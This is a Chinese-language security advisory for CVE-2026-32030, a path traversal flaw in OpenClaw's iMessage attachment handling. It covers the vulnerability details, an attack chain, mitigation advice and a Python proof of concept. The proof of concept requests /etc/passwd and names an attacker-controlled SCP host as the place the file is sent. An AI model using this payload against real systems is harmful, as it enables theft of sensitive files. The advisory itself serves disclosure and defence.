CVE-2026-32030 CVSS 7.5 高危

CVE-2026-32030 OpenClaw路径穿越漏洞致敏感文件泄露

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32030

漏洞类型

路径穿越

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.2.19之前的版本中存在严重的路径穿越漏洞。该漏洞源于stageSandboxMedia函数未能正确验证输入路径，当启用iMessage远程附件获取功能时，系统接受任意绝对路径。攻击者可利用此漏洞篡改附件路径元数据，通过SCP协议读取OpenClaw进程在远程主机上有权访问的任意文件，从而造成敏感信息泄露。

技术细节

该漏洞的核心原理在于OpenClaw的`stageSandboxMedia`函数对文件路径的校验不严。在处理iMessage远程附件时，如果启用了远程附件获取功能，该函数会直接使用用户提供或受控的路径元数据，而未限制其必须在预期的沙箱目录内。利用方式上，攻击者首先需要能够篡改iMessage附件的路径元数据。通过构造包含“../”或直接使用绝对路径（如/etc/passwd）的恶意路径，欺骗OpenClaw去读取目标文件。OpenClaw随后会尝试通过SCP（Secure Copy Protocol）将文件传输到配置的远程主机。由于SCP命令是由OpenClaw进程发起的，攻击者无需直接访问文件系统，只需控制路径参数，即可将服务器上的敏感文件（如配置文件、密钥等）下载到攻击者控制的远程位置，实现无交互的敏感文件窃取。

攻击链分析

STEP 1

信息收集

攻击者确认目标运行的是OpenClaw 2026.2.19之前的版本，且启用了iMessage远程附件获取功能。

STEP 2

构造恶意元数据

攻击者篡改iMessage附件的路径元数据，将其替换为目标系统上的敏感文件绝对路径（如/etc/passwd）。

STEP 3

触发漏洞

OpenClaw处理该附件请求，stageSandboxMedia函数读取攻击者指定的绝对路径，准备通过SCP传输。

STEP 4

数据窃取

OpenClaw进程发起SCP连接，将读取到的敏感文件传输到攻击者配置的远程主机，完成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# This is a conceptual PoC for CVE-2026-32030
# It demonstrates how a malicious path could be crafted to exploit the stageSandboxMedia vulnerability.

import requests

def exploit_path_traversal(target_url, malicious_path):
    """
    Simulates sending a request to the vulnerable stageSandboxMedia function
    with a crafted absolute path.
    """
    # The endpoint might vary, assuming an API endpoint based on the description
    endpoint = f"{target_url}/api/stageSandboxMedia"

    # Payload construction: The attacker controls the 'attachment_path' parameter
    # Using an absolute path to read a sensitive file like /etc/passwd
    payload = {
        "message_id": "fake_msg_id",
        "attachment_path": malicious_path,  # e.g., "/etc/passwd"
        "remote_host": "attacker_controlled_scp_server"
    }

    try:
        # Sending the malicious request
        response = requests.post(endpoint, json=payload)
        if response.status_code == 200:
            print(f"[+] Success! File likely staged for SCP transfer.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

# Example usage
if __name__ == "__main__":
    target = "http://vulnerable-openclaw-instance"
    # Targeting a common sensitive file on Linux systems
    sensitive_file = "/etc/passwd"
    exploit_path_traversal(target, sensitive_file)

影响范围

OpenClaw < 2026.2.19

防御指南

临时缓解措施

建议立即升级到OpenClaw 2026.2.19或更高版本以修复此漏洞。如果无法立即升级，应暂时禁用iMessage远程附件获取功能，并严格限制OpenClaw进程对系统敏感文件的读取权限，同时检查SCP传输日志以检测异常的数据外传行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表